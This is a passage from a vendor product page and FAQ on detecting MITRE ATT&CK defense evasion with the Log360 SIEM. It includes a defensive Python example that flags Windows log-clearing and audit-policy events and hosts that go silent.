Log360's 963+ TA0005 correlation rules, combined with real-time Windows and Active Directory monitoring and UEBA behavioral baselines, give security teams the coverage depth to catch defense evasion techniques that signature-based controls miss. Pre-built investigation dashboards surface the complete evidence chain from initial masquerading or obfuscation events through process injection, registry tampering, indicator removal, and artifact hiding in a single correlated incident view.


Frequently asked questions

What is defense evasion in cybersecurity?

Defense evasion refers to the techniques adversaries use to avoid detection, bypass security controls, and erase traces of their activity inside a compromised environment. In the MITRE ATT&CK® framework, it is classified as tactic TA0005 and encompasses the largest technique count of any ATT&CK tactic. Log360 maps 963+ detection rules to this tactic, with coverage spanning Windows endpoints, Active Directory, cloud environments, and network devices.

Why is defense evasion the largest tactic in MITRE ATT&CK?

Defense evasion has the largest technique count because the attack surface for evading detection is enormous. Every detection mechanism in a security stack (endpoint agents, event logging, behavioral analytics, network monitoring) represents a potential bypass target. As security controls have increased in number and capability over the past decade, adversaries have responded by developing an equally broad range of evasion sub-techniques, from LOLBAS abuse to direct tampering with monitoring infrastructure. The breadth of the tactic reflects the breadth of the security tooling it is designed to defeat.

What are LOLBAS techniques and how does Log360 detect them?

Living-off-the-land binary and script (LOLBAS) techniques involve using legitimately signed operating system tools to execute malicious payloads, avoiding the need to drop custom malware on disk. Common examples include renamed system binaries (T1036), obfuscated PowerShell commands delivered in-memory (T1027), and injection into trusted host processes (T1055). Log360 detects LOLBAS abuse by monitoring child process relationships, command-line argument patterns, and directory-of-origin anomalies, comparing all of these against known-normal behavioral baselines. Rules under T1036 (masquerading), T1027 (obfuscated files), and T1055 (process injection) cover the majority of documented LOLBAS execution patterns.

How do I detect log tampering and audit policy changes with a SIEM?

Log tampering detection relies on monitoring two Windows events: Event ID 1102 (Security audit log cleared) and Event ID 104 (System log cleared). Either event is a high-priority finding requiring immediate investigation because legitimate administrators rarely clear Security logs in a production environment without a scheduled maintenance window. Audit policy changes are captured in Event ID 4719. Log360 monitors all three events with dedicated correlation rules and alerts in real time. Additionally, Log360's log collection health monitoring surfaces hosts that stop forwarding events, which can indicate that logging has been disabled or the agent has been stopped.
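Both the Layer 3 section above and this answer describe the same two mechanisms: single-event rules for Event IDs 1102, 104 and 4719, and a continuity check that surfaces hosts that stop forwarding. The Python below is an added example covering both, written for this page; it is not Log360 code or Log360's rule definitions. The event layout (`Computer`, `Channel`, `EventID`, `Time`), the rule names, the `MAX_SILENCE` tolerance and the sample events are assumptions constructed for the example.

```python
from datetime import datetime, timedelta
from typing import Optional

# Single-event rules: one occurrence is a finding, no threshold or aggregation needed.
SINGLE_EVENT_RULES = {
    (1102, "Security"): ("Security Eventlog Cleared", "Critical"),
    (104, "System"): ("System Eventlog Cleared", "Critical"),
    (4719, "Security"): ("Audit Policy Changed", "Trouble"),
}
MAX_SILENCE = timedelta(minutes=15)  # assumed tolerance before a host counts as silent


def match_single_event(ev: dict) -> Optional[dict]:
    rule = SINGLE_EVENT_RULES.get((ev["EventID"], ev["Channel"]))
    if rule is None:
        return None
    return {"host": ev["Computer"], "time": ev["Time"], "user": ev.get("SubjectUserName", ""),
            "rule": rule[0], "severity": rule[1]}


def single_event_alerts(events) -> list[dict]:
    return [alert for alert in map(match_single_event, events) if alert is not None]


def silent_hosts(events, expected_hosts, now: datetime) -> list[tuple[str, Optional[datetime]]]:
    """Hosts that have sent nothing for longer than MAX_SILENCE (or nothing at all)."""
    last_seen: dict[str, datetime] = {}
    for ev in events:
        host = ev["Computer"]
        if host not in last_seen or ev["Time"] > last_seen[host]:
            last_seen[host] = ev["Time"]
    return [(host, last_seen.get(host)) for host in sorted(expected_hosts)
            if host not in last_seen or now - last_seen[host] > MAX_SILENCE]


def events_preserved_before(events, alert: dict) -> int:
    """Count of the host's events the SIEM already holds from before the clear."""
    return sum(1 for ev in events if ev["Computer"] == alert["host"] and ev["Time"] < alert["time"])


# Constructed event stream (not real telemetry): four hosts, one of which goes quiet.
T0 = datetime(2026, 3, 2, 9, 0)


def _ev(host: str, event_id: int, channel: str, minutes: int, **extra) -> dict:
    return {"Computer": host, "EventID": event_id, "Channel": channel,
            "Time": T0 + timedelta(minutes=minutes), **extra}


SAMPLE_EVENTS = [
    _ev("WS01", 4624, "Security", 0),
    _ev("SRV01", 4624, "Security", 5),
    _ev("WS02", 4688, "Security", 10),
    _ev("WS01", 4719, "Security", 38, SubjectUserName="jdoe"),
    _ev("WS01", 1102, "Security", 40, SubjectUserName="jdoe"),
    _ev("WS02", 4688, "Security", 55),
    _ev("WS01", 4688, "Security", 57),
]
EXPECTED_HOSTS = {"WS01", "WS02", "SRV01", "WS03"}
NOW = T0 + timedelta(minutes=60)

if __name__ == "__main__":
    for alert in single_event_alerts(SAMPLE_EVENTS):
        print(alert, "events preserved before clear:", events_preserved_before(SAMPLE_EVENTS, alert))
    print("silent:", silent_hosts(SAMPLE_EVENTS, EXPECTED_HOSTS, NOW))
```

The stream shows the ordering the text warns about: the audit policy change at 09:38 arrives two minutes before the Security log is cleared at 09:40, and both events, plus the earlier logon, are already in the SIEM when the clear happens. SRV01 has sent nothing since 09:05 and WS03 nothing at all, so the continuity check reports both even though neither produced a tampering event.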

What is the relationship between defense evasion and privilege escalation?

Defense evasion and privilege escalation (TA0004) are frequently paired in real-world attacks. Attackers typically escalate privileges first to gain administrative access, then use those elevated rights to clear audit logs (T1070), tamper with security-related registry keys (T1112), or hide their tools and accounts from standard enumeration (T1564) without generating additional privilege-use events. A log clearing or registry tampering alert often indicates that a privilege escalation event happened moments or hours earlier. Correlating both tactics in your incident response workflow is essential for reconstructing the full attack timeline.
